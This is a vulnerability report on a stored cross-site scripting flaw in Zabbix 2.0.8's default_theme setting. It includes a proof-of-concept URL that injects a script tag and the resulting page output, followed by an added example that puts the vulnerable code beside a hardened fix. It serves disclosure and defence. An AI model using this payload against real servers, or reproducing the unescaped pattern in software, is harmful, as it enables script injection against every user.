- Incident report
- Resolution: Fixed
- Critical
- 2.0.8
- None
- Ubuntu
The default_theme is set by an administrative user who has access to adm.gui.php.
adm.gui.php:
    $configs = array(
        'default_theme' => get_request('default_theme'),
        ...
    );
    update_config($configs);
default_theme is not sanitized before being stored in the database, and it is echoed without escaping.
page_header.php:
    $css = $config['default_theme'];
    <body class="<?php echo $css; ?>">
Example:
http://zabbixserver/zabbix/adm.gui.php?sid=f449c57db01c1234&form_refresh=1&form_refresh=1&default_theme=originalblue">test1234<script>alert("xss")</script>&dropdown_first_entry=1&dropdown_first_remember=1&search_limit=1000&max_in_table=50&event_ack_enable=1&event_expire=7&event_show_max=100&server_check_interval=10&save=Save
(change sid to a valid admin sid)
Response:
<body class="originalblue">
test1234
<script>
alert("xss")
</script>
/main.css" />
page_header.php is required by every page:
blah@blah:/var/www/zabbix$ grep -i "page_header" ./*
./acknow.php:require_once dirname(__FILE__).'/include/page_header.php';
./actionconf.php:require_once dirname(__FILE__).'/include/page_header.php';
./adm.gui.php:require_once dirname(__FILE__).'/include/page_header.php';
./adm.housekeeper.php:require_once dirname(__FILE__).'/include/page_header.php';
./adm.iconmapping.php:require_once dirname(__FILE__).'/include/page_header.php';
....truncated....
The theme saved is displayed for every user on every page, making this critical.
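As an added illustration (not Zabbix code and not part of the original report), here is the adm.gui.php / page_header.php pattern described above beside a hardened version: the theme name is checked against an allow-list when it is saved, and escaped again when it is written into the body tag. The allow-list entries other than originalblue are assumed placeholders, and the request array is constructed from the report's payload.

```php
<?php
// Added example, not Zabbix's own code. Shows the unsanitized theme
// pattern from the report next to an input-validated, output-escaped form.

// Themes this installation ships. Only "originalblue" comes from the report;
// the other names are assumed placeholders.
const ALLOWED_THEMES = ['originalblue', 'darkblue', 'classic'];

// Vulnerable: the submitted value is stored as-is ...
function vulnerable_config(array $request): array {
    return ['default_theme' => $request['default_theme'] ?? ''];
}

// ... and later echoed raw into an attribute on every page.
function vulnerable_body_tag(array $config): string {
    return '<body class="' . $config['default_theme'] . '">';
}

// Hardened step 1: validate on input. A theme name must match one of the
// known themes exactly; anything else is rejected rather than "cleaned".
function validate_theme(string $theme): string {
    if (!in_array($theme, ALLOWED_THEMES, true)) {
        throw new InvalidArgumentException('Unknown theme: ' . $theme);
    }
    return $theme;
}

// Hardened step 2: escape on output as well, because the stored value may
// have been written earlier by a path that did not validate it.
function safe_body_tag(array $config): string {
    $css = htmlspecialchars($config['default_theme'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<body class="' . $css . '">';
}

// Constructed request mirroring the report's payload shape.
$request = ['default_theme' => 'originalblue">test1234<script>alert("xss")</script>'];

echo vulnerable_body_tag(vulnerable_config($request)), "\n";
echo safe_body_tag(vulnerable_config($request)), "\n";

try {
    validate_theme($request['default_theme']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

With validation in place the payload never reaches the database; the output escaping is defence in depth for values that were stored before the fix.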
Thanks
-Lincoln